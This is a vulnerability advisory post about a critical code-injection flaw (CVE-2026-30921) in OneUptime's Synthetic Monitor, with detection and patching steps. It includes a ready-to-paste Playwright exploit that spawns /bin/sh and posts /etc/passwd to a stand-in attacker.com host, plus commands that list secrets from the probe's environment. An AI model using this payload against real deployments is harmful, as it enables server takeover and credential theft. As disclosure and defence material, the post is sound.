OneUptime, Remote Code Execution, CVE-2026-30921 (Critical)

Listen to this Post

The vulnerability allows any low-privileged, authenticated project user to achieve remote code execution on the OneUptime Probe server. The root cause lies in the Synthetic Monitor feature, which executes user-supplied Playwright code inside an insecure Node.js vm sandbox. Unlike traditional escapes that rely on breaking out of the vm, this issue exposes live host objects (browser, page) directly to the untrusted script. The probe uses Playwright version 1.58.2, where the browser.browserType().launch() method accepts attacker-controlled parameters like executablePath. By calling this method, an attacker can instruct the probe to spawn an arbitrary executable (e.g., /bin/sh) with malicious arguments. Because the host objects retain their real this binding, the sandboxed code can invoke these Playwright APIs without needing to escape the vm. Even though Playwright may later throw an error because the spawned process isn’t a real browser, the command has already executed on the host. This attack path is reachable via both one-shot monitor tests and scheduled monitor executions. The injected code runs within the probe container, which holds critical cluster credentials (database passwords, secrets) in its environment variables. Consequently, a successful exploit grants the attacker full control over the probe and often leads to complete cluster compromise. This is a server-side RCE that does not require a separate sandbox escape; the dangerous capability is exposed by design.

dailycve form:

Platform: OneUptime
Version: <10.0.20
Vulnerability : Code Injection
Severity: Critical
date: 2026-03-09

Prediction: Patched already

What Undercode Say:

Analytics:

Check current OneUptime version (if self-hosted)
docker ps --filter "name=oneuptime" --format "table {{.Names}}\t{{.Image}}"
Inspect the probe container to verify vulnerable Playwright version (1.58.2)
docker exec oneuptime-probe npm list playwright | grep playwright
Check if the probe runs with host networking (exposing credentials)
docker inspect oneuptime-probe | jq '.[].HostConfig.NetworkMode'
Search for exposed credentials in probe environment
docker exec oneuptime-probe env | grep -E 'ONEUPTIME_SECRET|DATABASE_PASSWORD|REDIS_PASSWORD|CLICKHOUSE_PASSWORD'

Exploit:

// Paste this into the Synthetic Monitor Playwright code field
browser.browserType().launch({
executablePath: "/bin/sh",
ignoreDefaultArgs: true,
args: [
"-c",
"id > /tmp/pwned && curl -X POST -d @/etc/passwd http://attacker.com/exfil"
],
timeout: 1000
}).catch((err) => {
console.log(String(err));
});
return { data: { launched: true } };

Protection from this CVE:

Upgrade to the patched version (10.0.20 or later)
If using Docker Compose:
git pull origin main
docker-compose pull
docker-compose up -d
Verify the fix (migration to isolated-vm package)
docker exec oneuptime-probe npm list | grep isolated-vm
As a workaround, restrict project membership and disable open registration
Set DISABLE_SIGNUP=true in your environment variables
Audit all existing Synthetic Monitors for malicious payloads

Impact:

Server-side Remote Code Execution on the oneuptime-probe container. An attacker gains immediate access to all environment variables, including ONEUPTIME_SECRET, DATABASE_PASSWORD, REDIS_PASSWORD, and CLICKHOUSE_PASSWORD. With host networking enabled, the attacker can pivot directly to internal databases, Redis, and ClickHouse using the stolen credentials. This leads to full cluster compromise, data theft, and potential lateral movement within the infrastructure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top